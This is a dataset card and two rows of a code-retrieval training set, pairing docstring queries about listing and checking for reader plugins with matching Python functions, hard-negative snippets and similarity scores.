column            type              lengths / values
query             stringlengths     9 - 3.4k
document          stringlengths     9 - 87.4k
metadata          dict
negatives         sequencelengths   4 - 101
negative_scores   sequencelengths   4 - 101
document_score    stringlengths     3 - 10
document_rank     stringclasses     102 values
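Each row pairs a natural-language query (typically a docstring) with the document, the code snippet that implements it, along with a pool of hard-negative snippets (negatives), one similarity score per negative (negative_scores), the similarity score assigned to the true document (document_score), and a rank field (document_rank). Below is a minimal sketch of loading and inspecting one row with the Hugging Face datasets library; the dataset identifier used here is a hypothetical placeholder, not the actual repository name.

```python
# Minimal sketch: load the dataset and inspect one row.
# "org/code-retrieval-triplets" is a hypothetical placeholder identifier.
from datasets import load_dataset

ds = load_dataset("org/code-retrieval-triplets", split="train")

row = ds[0]
print(row["query"])                 # natural-language description (docstring)
print(row["document"])              # matching code snippet
print(len(row["negatives"]))        # 4 to 101 hard-negative snippets
print(len(row["negative_scores"]))  # one similarity score per negative
print(row["document_score"], row["document_rank"])
```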
List the names of available readers. Note that this will import all readers.
def names() -> Tuple[str, ...]:
    return plugins.list_all(package_name=__name__)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_readers():\n return all_readers", "def get_reader_funcs():\n return READERS", "def list_reads(cls) -> list:\n return [cls.FWREAD, cls.RVREAD];", "def namelist(self):\n return self._handle.getnames()", "def namelist(self):\n return self._handle.getnames()", "def list_contents(reader: UFOReader) -> list[str]:\n return reader.getImageDirectoryListing() # type: ignore", "def list_drivers(self):\n return self.ironic_client.driver.list()", "def namelist(self):\n return self._handle.namelist()", "def namelist(self):\n return self._handle.namelist()", "def initialize_file_readers():\n savefile_path = os.path.join(os.getcwd()+ \"/../data/\", SAVE_FILE)\n file_reader_list = []\n for file in os.listdir(savefile_path):\n file_reader = open(os.path.join(savefile_path,file), \"r\")\n file_reader_list.append({\"file_reader\": file_reader, \"last_read\": { \"word\": \"\", \"doc_score_list\": []}})\n return file_reader_list", "def short_docs(*readers: str) -> List[Tuple[str, str]]:\n if not readers:\n readers = names()\n\n return [(r, plugins.doc(__name__, r, long_doc=False)) for r in readers]", "def get_driver_names():\n return drivers.keys()", "def list_parsers(self, *args):\n print('==== Available parsing modules: ====\\n')\n for parser in sorted(self.parse_modules):\n print(self.parse_modules[parser].name.ljust(16) + \\\n ': ' + self.parse_modules[parser].desc)\n sys.exit(0)", "async def setReaders(self, eventID: str, readers: Iterable[str]) -> None:", "def get_list():\n\n print(f\"Корневой каталог: {config_tools.NAME_PATH}\")\n for dirpath, dirnames, filenames in os.walk(config_tools.NAME_PATH):\n # перебрать каталоги\n for dirname in dirnames:\n print(\"Каталог:\", os.path.join(dirpath, dirname))\n # перебрать файлы\n for filename in filenames:\n print(\"Файл:\", os.path.join(dirpath, filename))", "def object_readers(name, *, specify_reader=False):\n\treturn object_access('read', name, specify_reader)", "def names(self) -> list[str]:", "def names(self) -> List:\n ...", "def list(cls, standalone=True):\n\t\tif standalone:\n\t\t\treturn [i.name for i in cls]\n\t\telse:\n\t\t\treturn [i.name for i in FetcherEnum if issubclass(i.value, Fetcher)]", "def namelist(self):\n return []", "def read_all(self):\r\n pass", "def get_drivers():\n return [str(d) for d in drivers.values()]", "def keys(self):\n self._load()\n return list(self._file_openers.keys())", "def listPrinters(self):\n raise NotImplementedError(\"listPrinters not implemented\")", "def getListCreators(self):\n return _libsbml.ModelHistory_getListCreators(self)", "def available_tracers(self):\n return self.target.read_value(self.available_tracers_file).split(' ')", "def names():\n pass", "def list_requesters():\n from mephisto.core.local_database import LocalMephistoDB\n from tabulate import tabulate\n\n db = LocalMephistoDB()\n requesters = db.find_requesters()\n dict_requesters = [r.to_dict() for r in requesters]\n click.echo(tabulate(dict_requesters, headers=\"keys\"))", "def fd_list():\n try:\n fp = FdMultiController._path_generator(FdMultiController._db_registry_name)\n with open(fp, \"rb\") as pfile:\n names = pickle.load(pfile)\n return list(names)\n except OSError:\n return []", "def GetResourceNames(self):\r\n return [x.name for x in self.resources]", "async def readers(self, eventID: str) -> Iterable[str]:", "def on_readers_init(readers):\n for fmt in MarkdownExtReader.file_extensions:\n readers.reader_classes[fmt] = MarkdownExtReader", "def get_driver_list():\n return list(object_store.ObjectStorageDriver.registry.keys())", 
"def loaded_modules() -> List[str]:\n return PYSTAC_IO.keys()", "def get_resources(self):\n return []", "def get_names(self):\n return self.names", "def names(self):\n\t\treturn", "def _list_estimators():\n estimators = ['Natural', 'Davis-Peebles', 'Hewett', 'Hamilton', 'Landy-Szalay']\n return estimators", "def get_providers(self):\n return [\"Rainfall\", \"Average Rainfall Sea\", \"Average Rainfall Land\"]", "def run(self):\n logging.debug('List Available Recipes')\n if self.short:\n print(' '.join(pakit.recipe.RDB.names(desc=False)))\n return\n\n available = ['Program Description']\n available.extend(pakit.recipe.RDB.names(desc=True))\n\n msg = 'Available Recipes:'\n msg += PREFIX + PREFIX.join(available)\n print(msg)\n return msg", "def listBuilderNames():", "def listBuilderNames():", "def spark_list(provider):\n api.available(provider)", "def names(self):\n return self._names", "def names(self):\n return self._names", "def names(self):\n return self._names", "def do_list_availble_books(self, line):\n\t\tprint('\\nBooks in your current directory: \\n')\n\t\tfor i in os.listdir():\n\t\t\tif i.endswith('.bin'):\n\t\t\t\tprint(i)\n\t\tprint('\\n')", "def getNames(self) -> List[unicode]:\n ...", "def reservoir_names(self):\n return self._reservoirs", "def list_donors(self):\n return [donor.name for donor in self.donors]", "def names(self):\n return self.__names", "def _list_users(self):\n users = fileIO.load_json(\"users.json\")\n print(\"The list of users is as follows:\")\n for i in users:\n print(users[i][\"name\"])\n self._list_user_settings(users)", "def list_builders(self) -> List[str]:\n return sorted(_iter_builder_names(self._ns2data_dir))", "def gene_list_reader():\n \n relPath = \"data/genes_met_modelling_human.csv\"\n \n geneL = []\n with file_importer(relPath, encodeS = \"utf-8-sig\") as inpF:\n for inpLine in inpF:\n inpI = inpLine.strip(\"\\n'\").split(\".\")[0]\n if inpI not in geneL: geneL.append(inpI)\n \n return geneL", "def print_donor_list():\n print(data_base.donor_names)", "def get_names(self):\n return self.__names", "def get_rnames(self):\n for row in self._get_references_node():\n yield row['name']", "def listed_data(self, reader):\n result = []\n for line in reader:\n result.append(line)\n return result", "def return_names(self):\n return self.__name_list", "def reservoir_name_list(self):\n return list(self._node_reg.reservoir_names)", "def names(self) -> Sequence[str]:\n return pulumi.get(self, \"names\")", "def names(self) -> Sequence[str]:\n return pulumi.get(self, \"names\")", "def __dir__(self) -> list[str]:\n d = list(super().__dir__())\n d.extend([w.name for w in self._list if not w.gui_only])\n return d", "def get_camera_list():\n cameras = []\n modules = glob.glob(os.path.join(os.path.dirname(__file__), '*_camera.py'))\n for module in modules:\n m = import_module('.' 
+ os.path.basename(module)[:-3], __name__)\n cameras.append({'name': os.path.basename(module)[:-10], 'description': m.__doc__}) \n return cameras", "def list(self):\n response = self._client.get('scanners/1/agents')\n return AgentList.from_json(response.text)", "def get_readings(self):\n\n return Readings(\n arduino=self.inputs.get_arduino_reading(),\n tapo=self.inputs.get_tapo_plug_reading(),\n garden=self.inputs.get_garden_co2_reading(),\n )", "def names(cls) -> List[str]:", "def getNames(self):\n return self._Names", "def getPeripheralNames(self):\n pass", "def list_drivers():\n return jsonify(drivers)", "def list_available_authenticators(avail_auths):\n output_lines = [\"Available authenticators:\"]\n for auth_name, auth in avail_auths.iteritems():\n output_lines.append(\" - %s : %s\" % (auth_name, auth.description))\n return '\\n'.join(output_lines)", "def get_providers(self):\n return [\"Temperature\", \"Average Temperature Sea\", \"Average Temperature Land\"]", "def cli_list(ctx):\n\n _list_spiders(ctx)", "def list_rights(self):\n if self.resource is None:\n self.resource = self.client.get_resource(self.href)\n rights = []\n if hasattr(self.resource, 'RightReferences') and \\\n hasattr(self.resource.RightReferences, 'RightReference'):\n for right in self.resource.RightReferences.RightReference:\n rights.append({'name': right.get('name')})\n return rights", "def names(self):\n if not self.extensions:\n self.discover()\n\n names = list(self.builtins.keys())\n names += self.extensions.keys()\n\n return sorted(names)", "def load_names() -> list:\n with open(Path(\"bot/resources/pride/drag_queen_names.json\"), \"r\", encoding=\"utf8\") as f:\n return json.load(f)", "def getOriNames( self ):\n\n if self.oriNames:\n return self.oriNames.keys()\n\n n = self.adb.get( \"nRsfs\" )\n for indx in xrange( n ):\n name = self.adb.get( \"rsfName\", indx )\n self.oriNames[ name ] = indx\n\n return self.oriNames.keys()", "def get_all_books():\n for n, book in enumerate(BOOKS, 1):\n state = 'YES' if book['read'] else 'NO'\n print(\n f\"{[n]} - {book['name'].capitalize()}, by {book['author'].capitalize()} - Read: {state}\"\n )", "def get_list_of_names():\n conn = r.connect(host=HOST, port=PORT, db=DB)\n names = r.table(FINGERPRINT_TABLE)[\"name\"].run(conn)\n return list(names)", "def list(self):\n\n result = []\n for i in self.bots:\n result.append(i.name)\n return result", "def get_crl_gnames(self):\n urls = ['uri:' + u for u in self.crl_urls]\n return self.load_gnames(urls)", "def listRepositories(self):\n return self.mini_catalog.listRepositories()", "def get_scraper_list(scraper_dir):\n scraper_files = [name for name in os.listdir(scraper_dir) if name.endswith('.py')]\n scrapers = []\n for filename in scraper_files:\n scr = filename.replace('.py', '')\n scr_inst = SourceFileLoader(fullname=scr, path='{0}/{1}'.format(scraper_dir, filename)).load_module()\n if hasattr(scr_inst, \"get_deals\"):\n scrapers.append(scr_inst)\n\n return scrapers", "def list(self):\n resources = self._os_resource_manager.list()\n resource_list = []\n for resource in resources:\n resource_list.append(self._resource_class(id=resource.id,\n name=resource.name))\n return resource_list", "def read(self) -> List[str]:\n pass", "def ls(self):\n files = self.drive.files().list().execute().get(\"files\", [])\n for f in files:\n print(f[\"name\"], f[\"mimeType\"])", "def get_init_all_names(self) -> list[str]:\n names = {self.client.name, self.client.alias_name}\n if self.service_resource:\n names.add(self.service_resource.name)\n 
names.add(self.service_resource.alias_name)\n for waiter in self.waiters:\n names.add(waiter.name)\n for paginator in self.paginators:\n names.add(paginator.name)\n\n result = list(names)\n result.sort()\n return result", "def list():\n\n click.secho('List of libraries in SJSU-Dev2\\n', fg='white', bold=True)\n package_registry = GetListOfSJSUDev2Repos()\n library_list = [f'{x : <20}: {package_registry[x]}'\n for x in package_registry if x.startswith('lib')]\n print('\\n'.join(library_list))", "def __dir__(self):\n return [\n \"get\",\n \"list\",\n \"delete\",\n \"examples\",\n \"wait_for_state\",\n \"refresh\",\n \"install\",\n ]", "def get_readable_inners(self):\n return self.value", "def notifiers(self):\n return self.registry.keys()", "def list():\n\n\treturn netifaces.interfaces()", "def read_wks(self):\n list = []\n with open(self.wks_file) as wks_file:\n fieldnames = ['name', 'ip', 'port']\n routers = csv.DictReader(wks_file, fieldnames=fieldnames)\n for router in routers:\n list.append(router)\n return list", "def _list_of_availability_strings():\n names = [availability.name for availability in Availability]\n return names", "def read_utilities(self):\n self.progs = self.lnp.read_utilities()\n self.update_autorun_list()", "def list_clients(): # Listar clientes\n global clients\n\n for idx, client in enumerate(clients):\n print('{}: {}'.format(idx, client))", "def getRaceList(self):\n\t\tl = []\n\t\tfor r in self.races:\n\t\t\tl.append(r.name)\n\t\treturn l", "def get_names(self):\n return [doc['name'] for doc in self.vocab]", "def do_list(client, args):\n\trepos = client.repos.list(args.user)\n\tprint '%s has the following repositories:' % args.user\n\tprint 'Name - Description'\n\tfor repo in repos:\n\t\tprint '%s - %s' % (repo.name, repo.description)", "def resource_names(self):\n return self._resource_names" ]
[ "0.7477495", "0.64536035", "0.63747376", "0.5518427", "0.5518427", "0.5415075", "0.5403663", "0.5381984", "0.5381984", "0.53160554", "0.5299087", "0.527088", "0.52304727", "0.52028954", "0.5191611", "0.5185727", "0.51809806", "0.5179094", "0.5153803", "0.51439035", "0.513742", "0.5125775", "0.5111741", "0.5107429", "0.51011485", "0.51009417", "0.50834286", "0.50811934", "0.5065152", "0.5060945", "0.5060056", "0.5047146", "0.5031644", "0.5028029", "0.5024121", "0.50160456", "0.50140953", "0.5013292", "0.5009855", "0.5006149", "0.49994984", "0.49994984", "0.49933106", "0.49773976", "0.49773976", "0.49773976", "0.49767822", "0.49715772", "0.49703357", "0.49690422", "0.49511793", "0.49469292", "0.49430314", "0.4936938", "0.4936594", "0.49301526", "0.49224576", "0.4922313", "0.4912036", "0.49046078", "0.48790976", "0.48790976", "0.4867614", "0.4866823", "0.48645806", "0.4862834", "0.48556614", "0.48499855", "0.48475945", "0.48445985", "0.48328635", "0.48296928", "0.482911", "0.48259285", "0.48210406", "0.48122162", "0.48043987", "0.47996515", "0.47936463", "0.47920805", "0.4791969", "0.47883222", "0.47875166", "0.47868538", "0.47858447", "0.4781238", "0.47810438", "0.478037", "0.4777324", "0.47700268", "0.47692105", "0.4762983", "0.47623897", "0.4751298", "0.47510615", "0.4749781", "0.47495976", "0.47439003", "0.47438976", "0.47396666" ]
0.47953343
78
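The objective metadata in each row marks it for triplet-style training: the query serves as the anchor, the document as the positive, and each entry in negatives as a candidate negative. Below is a minimal sketch, under that reading, of expanding one row into (anchor, positive, negative) triplets; the downstream use with a contrastive or triplet loss is an assumption for illustration, not something the dataset specifies.

```python
# Sketch: expand one row into (anchor, positive, negative) triplets, following
# the "triplet": [["query", "document", "negatives"]] objective above.
def row_to_triplets(row: dict) -> list[tuple[str, str, str]]:
    anchor, positive = row["query"], row["document"]
    return [(anchor, positive, negative) for negative in row["negatives"]]

# Each tuple can then be fed to a triplet-style contrastive loss
# (e.g. sentence-transformers' TripletLoss); that pairing is illustrative,
# not prescribed by the dataset.
```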
Check whether the given reader exists
def exists(reader_name: str) -> bool:
    return plugins.exists(package_name=__name__, plugin_name=reader_name)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _haveReadLocks(self): \n readLockFileName = ReadLock.fileName\n for name in os.listdir(self.dir):\n if name.startswith(readLockFileName):\n return True\n return False", "def exists(identifier, network):\n foo = next(load(identifier, network), None)\n return foo is not None", "def checkExist(self,fname,status):\n\n if (self.status == \"r\"):\n # Checks to see if it exists for reading\n # Which means it must be present\n\n if (not (os.path.exists(self.fname))):\n print(f\"Couldn't open input file: {self.fname}\")\n return False\n else:\n # Check to see if exists for reading\n # (i.e. must not exist)\n if (os.path.exists(self.fname)):\n print(f\"File {self.fname} already exists.\")\n return False\n\n return True", "def checkExist(self,fname,status):\n\n if (self.status == \"r\"):\n # Checks to see if it exists for reading\n # Which means it must be present\n\n if (not (os.path.exists(self.fname))):\n print(f\"Couldn't open input file: {self.fname}\")\n return False\n else:\n # Check to see if exists for reading\n # (i.e. must not exist)\n if (os.path.exists(self.fname)):\n print(f\"File {self.fname} already exists.\")\n return False\n\n return True", "def entry_exists(title):\n try:\n f = default_storage.open(f\"entries/{title}.md\")\n return True\n\n except FileNotFoundError:\n return False", "def test_read_before_connected(connection, reader, loop):\n value = loop.run_until_complete(connection.read())\n assert not value\n assert not reader.used", "def check_access(ident):\n resource = data_service.resource_load(uniq = ident)\n log.debug('Result from the database: %s'%resource)\n if resource is None:\n return False\n return True", "def does_resource_exist(resource):\n try:\n resource.load()\n return True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'ValidationError':\n return False\n else:\n raise e", "def _object_exists(name):\n conn = sqlite3.connect('/dev/input')\n try:\n cur = conn.cursor()\n sql = 'SELECT ROWID FROM object WHERE name=? 
AND deleted=0'\n cur.execute(sql, (name, ))\n result = cur.fetchall()\n return len(result) > 0\n finally:\n conn.close()", "def object_exists(self, fname):\n return False", "def object_exists(self, fname):\n return self.object_exists", "def is_file_exists(self):\n pass", "def object_exists(self, fname):\n return True", "def check_handle(handle):\n return os.path.isfile(get_path_filename(handle))", "def check_if_row_already_loaded(self, row, file_name):\n\t\tquery = \"SELECT count(*) FROM \" + TABLE_NAME + \" WHERE GLOBALEVENTID = \" + \"'\" + row[0] + \"'\"\n\n\t\ttry:\t\t\t\n\t\t\t# print query\n\t\t\tcursor = self.connection.cursor()\n\t\t\texecuted_cur = cursor.execute(query)\n\n\t\t\tif executed_cur:\t\t\t\n\t\t\t\tresult_cur = cursor.fetchall()\n\t\t\t\tfor row in result_cur:\n\t\t\t\t\tif int(row[0]) > 0:\n\t\t\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tprint \"[e] Something wrong with execution.\"\n\t\texcept Exception, e:\n\t\t\tprint '[e] Exeption: %s while processing \"%s\" file in method %s' % \\\n (str(e), DATA_DIRECTORY + '/' + file_name, \"check_if_row_already_loaded\")\n\t\t\tprint '\\t[q] Query that caused exception \\n %s' % (query)\n\n\n\t\treturn False", "def _check_row_exists(self, pk):\n session = self.session_factory()\n exists = session.query(PipelineRun).filter_by(id=pk).first()\n session.close()\n if exists:\n return True\n return False", "def ResourceExists(resource_name, search_user_paths=True):\n try:\n ResourcePath(resource_name, search_user_paths)\n return True\n except ResourceNotFound:\n return False", "def file_exists(path):\n\n try:\n with open(path):\n return True\n except IOError:\n return False", "def test_read_not_interested(self):\n try:\n self.reader.read(self.books[2], 0, 0)\n self.fail(\"Readed book not interested\")\n except AssertionError:\n pass", "def test_exists(self):\n d = self._examineOrSelect()\n self._response(b'* 3 EXISTS')\n self.assertEqual(\n self.successResultOf(d),\n {'READ-WRITE': False, 'EXISTS': 3})", "def exist(self):", "def read(reader: BitStreamReader, _index: int) -> bool:\n\n return reader.readBool()", "def _file_exists(name):\n try:\n f = open(name)\n f.close()\n return True\n except IOError:\n return False", "def resource_exists(uri: Optional[str]) -> bool:\n\n if uri is None:\n return True\n\n # TODO Replace after finding way to pass custom fs through FireO validator\n if uri.startswith(\"gs://\"):\n return True\n\n else:\n # Get file system\n fs, uri = url_to_fs(uri)\n\n # Check exists\n if fs.exists(uri):\n return True\n\n return False", "def exists(self):\n return True", "def exists(self):\n return True", "def check(self):\n # validate contents still to do - for now just check if it exists\n return os.path.exists(self.getDefaultDatabaseConnectionParameter()['path'])", "async def exists(self, tag_name):\n try:\n if await self.get_id(tag_name):\n return True\n except RtbDoesntExists:\n return False", "def exists (self, uuid):\n return self.read (uuid) is not None", "def get_reader(reader_type):\n return reader_dict.get(reader_type, None)", "def get_check_read(dbname, nrows=False, complete=True):\n db = get_db(dbname, complete=complete)\n if db is None:\n raise KeyError(\"no such database\")\n if not has_read_access(db):\n raise ValueError(\"may not read the database\")\n set_nrows(db, targets=nrows)\n return db", "def ResourceExists(self, name):\n pass", "def test_read_different_location(self):\n try:\n self.reader.read(self.books[1], 0, 1)\n self.fail(\"Readed book was not in the library\")\n except AssertionError:\n 
pass", "def exists(self, path):", "def exists(self, key):\n result = self.wrapped_db.exists(key)\n self.access_logs.reads[key] = self.wrapped_db.get(key) if result else None\n return result", "def exists():\n\treturn os.path.exists('data/strmr.db')", "def exists(self, path):\n return DataSource.exists(self, self._fullpath(path))", "def check_if_exists(self, bookID):\n query = f\"\"\"SELECT * from {TABLE} WHERE bookID = '{bookID}';\"\"\"\n res = self.cursor.execute(query)\n\n if self.cursor.fetchall():\n return True\n else:\n return False", "def line_exists():\n global _current_line\n return _current_line is not None", "def is_reader():\n\ttry:\n\t\temail = decode_token(request.headers.get('Authorization')[7:])[\"identity\"]\n\n\t\tcurrent_admin = Reader.query.filter_by(email=email).first()\n\texcept IndexError:\n\t\treturn bad_request(\"User is not an admin\")\n\n\tif current_admin is None:\n\t\treturn bad_request(\"User is not an admin\")", "def resourceExists(self, uri):\r\n return uri in self.cache", "def test_read_disconnected(connection, reader, schedule, flush, loop):\n schedule(connection.connect(), connection.disconnect())\n flush()\n value = loop.run_until_complete(connection.read())\n assert not value\n assert not reader.used", "def book_exist(author, title, edition):\n book = Book.query.filter_by(\n author=author,\n book_title=title,\n edition=edition).first()\n if book:\n return True\n return False", "def exists(redis_client: Redis, root_path) -> bool:\n return bool(redis_client.exists(root_path))", "def check_file_exist(self):\n return False", "def supplier_exist(supplier_name: str) -> bool:\n\n # Open a new connection\n db, cursor = db_connector.cursor()\n\n query = \"select name from supplier where name = '{}'\".format(supplier_name)\n cursor.execute(query)\n data = cursor.fetchall()\n db.disconnect()\n if len(data) == 0:\n return False\n return True", "def _exists (self):\n cursor = self._exec (self.select)\n return bool (cursor.fetchall ())", "def __contains__(self, username):\r\n if self.db == None:\r\n raise AssertionError(\"DB not open\")\r\n\r\n self.lock.acquire()\r\n try:\r\n return self.db.has_key(username)\r\n finally:\r\n self.lock.release()", "def exists(self):\r\n return os.path.exists(self.full_path)", "def check_exist(filename, status):\n\n if (status == \"r\"):\n # check to see if it exists for reading\n # (i.e. must be present)\n if (not (os.path.exists(filename))):\n print(f\"Couldn't open input file: {filename}.\")\n return False\n else:\n # check to see if it exists for writing\n # (i.e. 
must not exist or clobber=yes)\n if (os.path.exists(filename)):\n if (status == \"w\"):\n return True\n else:\n return False\n\n return True", "def exists(self):\n return self._repository is not None", "def fileExists(fileName):\n try:\n fileOpen = open(fileName, 'rt')\n fileOpen.close()\n except FileNotFoundError:\n return False\n else:\n return True", "def __is_csv(self):\n try:\n # just open to check if there is the file\n with open(self.__csv_file_name, 'r') as file:\n file.close()\n return True\n # if it do not exists the exception will returns false\n except IOError:\n return False", "def file_exist() -> bool:\n pass", "def canread(self):\n return False", "def exists(self) -> bool:\n try:\n result = self.get()\n except KeyError:\n return False\n return True", "def _checkDB(self, userID, key):\r\n # TODO: Why not return True directly instead all lines will be read\r\n # TODO: Should this be deferred to a separate thread due to flock,\r\n # which is a blocking call?\r\n found = False\r\n with open(self._dbFile, 'r') as bridgefile:\r\n fcntl.flock(bridgefile.fileno(), fcntl.LOCK_EX)\r\n lines = bridgefile.readlines()\r\n for line in lines:\r\n g = line.split(':')\r\n if g[0] == userID and str(g[1].rstrip()) == str(key):\r\n found = True\r\n return found", "async def _exists(self, key):\n with await self._connect() as redis:\n exists = await redis.exists(key)\n return True if exists > 0 else False", "def is_resource(self, path):\n # type: (Text) -> bool\n raise FileNotFoundError", "def check_exist(self):\n helper.RbdImageOperator._check_rbd_image(self.real_path)", "def exists(self, datadir):\n return False", "def record_exists(user):\n cnx = create_connection()\n cursor = cnx.cursor()\n\n query = \"SELECT * FROM \" + USAGE_TABLE['name'] + \" WHERE \" + USAGE_TABLE['relational_column'] + \" = '\" + user + \"'\"\n\n try:\n cursor.execute(query)\n except mysql.connector.Error as e:\n cursor.close()\n cnx.close()\n if e.errno == errorcode.ER_BAD_TABLE_ERROR:\n print(\"Table doesn't exist!\")\n else:\n print(e)\n return\n\n rows = cursor.fetchall()\n cnx.close()\n cursor.close()\n\n if len(rows):\n return True\n else:\n return False", "def exist(self):\n return self.file_path.exists()", "def test_obtain_read_lock_with_no_existing_locks(self):\n\n transaction = Transaction(\"T1\", TransactionType.READ_WRITE, 1)\n instruction = Instruction(\"R(T1, x2)\")\n self.assertEquals(instruction.variable_identifier, \"x2\")\n variable = self.data_manager.variables[\"x2\"]\n\n self.assertTrue(variable.readable)\n self.assertFalse(\"x2\" in self.data_manager.locks)\n\n value = self.data_manager.obtain_read_lock(transaction, instruction)\n self.assertEquals(len(self.data_manager.locks), 1)\n self.assertTrue(value)", "def notebook_exists(self, name, path=''):\n\n\t\tos_path = self._get_os_path(name, path=path)\n\t\treturn key_exists(self.bucket, os_path)", "def isDataSourceReadable(self):\r\n\r\n readable = True\r\n start, stop = self.getReadParameters(\\\r\n numpy.array(0, dtype=numpy.int64), self.chunk_size)\r\n try:\r\n self.data_source.read(start, stop)\r\n except tables.HDF5ExtError:\r\n readable = False\r\n print(translate('Buffer',\r\n \"\"\"\\nError: problems reading records. The dataset seems \"\"\"\r\n \"\"\"to be compressed with the {0} library. 
Check that it \"\"\"\r\n \"\"\"is installed in your system, please.\"\"\",\r\n 'A dataset readability error').\\\r\n format(self.data_source.filters.complib))\r\n\r\n return readable", "def dataset_exists(dataset_reference, client):\n from google.cloud.exceptions import NotFound\n\n try:\n client.get_dataset(dataset_reference)\n return True\n except NotFound:\n return False", "def Exists(self, path: str) -> bool:\n ...", "def hasContents():", "def exists(self):\r\n try:\r\n self.refresh()\r\n except:\r\n return False\r\n return True", "def exists(self):\r\n return bool(self.bucket.lookup(self.name))", "def test_project_reader(project):\n if is_server_administrator():\n return True\n if is_project_administrator(project):\n return True\n if is_project_writer(project):\n return True\n if is_project_reader(project):\n return True\n return False", "def object_exists(self, name: str):\n file_path = self.__get_file_path(name)\n return os.path.exists(file_path)", "def race_entry_exists(self, race_id):\n try:\n self.consolidated_db.data.loc[race_id] # Throws a KeyError if no entry is in the dataframe.\n return True\n except KeyError:\n return False", "def has_already_cover(record):\n cover_metadata = record.get(\"cover_metadata\", {})\n return cover_metadata.get(\"ISBN\", False) or cover_metadata.get(\n \"ISSN\", False\n )", "def get_reader(fn):\n if is_bed(fn):\n return BedReader(fn)\n elif is_vcf(fn):\n return VcfReader(fn)\n else:\n raise ValueError(\"Could not get reader for %s\" % fn)", "def is_present(self):\n try:\n self.read_binary(0, 2)\n return True\n except:\n return False", "def db_exists(self, db):\n # HDF5 is file based\n return os.path.isfile(db)", "def component_owner_reader(path):\n with open(path, 'rt') as f:\n component_reader = csv.DictReader(f)\n\n for row in component_reader:\n if row.get('Owner name') is not \"NONE\":\n yield row", "def verify_key_data_exists(key, file_name):\n try:\n with open(file_name, 'r') as file:\n lines = file.readlines()\n for line in lines:\n row = [r.strip() for r in line.split(',')]\n if row[0] == key:\n # row[3] has file name\n with open(row[3], 'r') as rfile:\n if rfile.read():\n return True\n return False\n except Exception as file_error:\n raise file_error", "def exists(self, _uri):\n #print(\"%s %s\"%(_uri))\n\n\n #-------------------- \n # Query logged files before checking\n #-------------------- \n if (os.path.basename(_uri) in self.fileDict):\n return True\n\n\n\n #-------------------- \n # Clean string\n #-------------------- \n xnatUrl = Xnat.path.makeXnatUrl(self.host, _uri)\n parentDir = Xnat.path.getUriAt(xnatUrl, 'files')\n for i in self.__getJson(parentDir):\n if os.path.basename(xnatUrl) in i['Name']:\n return True \n return False", "def __has_repo(repo_name):\n\n dtf_db = sqlite3.connect(DTF_DB)\n cur = dtf_db.cursor()\n\n sql = ('SELECT id '\n 'FROM repos '\n \"WHERE repo_name='%s' \"\n 'LIMIT 1' % repo_name)\n\n cur.execute(sql)\n\n return bool(cur.fetchone() is not None)", "def entry_exist_bool(dbfile, link):\n\n conn = sqlite3.connect(dbfile)\n c = conn.cursor()\n query = \"\"\"\n SELECT link FROM bringatrailer WHERE link='{}'\n \"\"\".format(link)\n c.execute(query)\n result = c.fetchall()\n if not result:\n return False\n else:\n return True", "def is_book_exist(self, book_info):\n for type, link in book_info.links.items():\n try:\n bookfile = BookFile.objects.get( link_hash = md5(link).hexdigest() )\n books = bookfile.book_set.all()\n if books:\n return True, books[0]\n except BookFile.DoesNotExist:\n continue\n try:\n book 
= Book.objects.get(author__name=book_info.authors, title=book_info.title)\n return True, book\n except Book.DoesNotExist:\n continue\n return False, None", "def entry_exists(conn, aid):\n # Select row with mid\n cursor = conn.execute(\"SELECT * FROM AffirmedAssignments WHERE aid=?\", (aid,))\n row = cursor.fetchone()\n\n if row is None:\n # Assignments entry does not exist.\n return False\n\n # Assignments entry exists\n return True", "def file_checker(file_name):\n if os.path.islink(file_name):\n print \"Crypto device Symlink %s exists\" % file_name\n return True\n else: \n try:\n with open(file_name):\n print \"File %s exists\" % file_name\n return True\n except IOError:\n print \"File %s does not exists\" % file_name\n return False", "def isExist(data):\n return True/False", "def exists(self):\n self.cursor.execute(f\"\"\"\n SELECT 1\n FROM {self.table_name}\n WHERE {self.lookup_type}='{self.word}'\n \"\"\")\n return True if self.cursor.fetchone() else False", "def wantsReadEvent(self):\r\n if self.result != None:\r\n return self.result == 0\r\n return None", "def has_table(self, name: str) -> bool:\n try:\n self.execute(\"select * from {table} limit 1\", name)\n return True\n except sqlite3.OperationalError:\n return False", "def _check_file(self, name):\n self.assertTrue(os.path.exists(name), \"Could not find table %s.\" % name)", "def readable(self):\n self._check_not_closed()\n return False", "def row_exists(self, key, transaction_id):\n return key in self.rows and \\\n self._get_history(transaction_id, key).node_exists()", "def exists(self) -> bool:\n return self._file_exists()", "def is_file_exist(self):\n return os.path.isfile(os.path.join(self.output_path, 'amr_corpus_ext.pickle'))", "def exists(self):\n return os.path.exists(self.sensorpath)", "def like_exists(db, filename, user):\n cur = db.cursor()\n sql = \"\"\"\n select * from likes where filename=? and usernick=?;\n \"\"\"\n cur.execute(sql, (filename, user))\n all = cur.fetchall()\n if len(all) > 0:\n return True\n else:\n return False", "def exists(self):\n\t\tif self.hasUdim:\n\t\t\treturn len( self.udimPaths ) != 0\n\t\treturn super( textureFile, self ).exists", "def test_from_reader_both_given(self):\n pandoc_default_files = [\n os.path.join(\n TEST_DEFAULT_FILES_PATH, \"from_reader_both_given.yaml\"\n )\n ]\n\n settings = get_settings(PANDOC_DEFAULT_FILES=pandoc_default_files)\n\n pandoc_reader = PandocReader(settings)\n source_path = os.path.join(TEST_CONTENT_PATH, \"valid_content.md\")\n\n with self.assertRaises(ValueError) as context_manager:\n pandoc_reader.read(source_path)\n\n message = str(context_manager.exception)\n self.assertEqual(\n (\n \"Specifying both from and reader is not supported.\"\n \" Please specify just one.\"\n ),\n message,\n )", "def exists(profile, name):\n result = fetch_by_name(profile, name)\n return len(result) > 0" ]
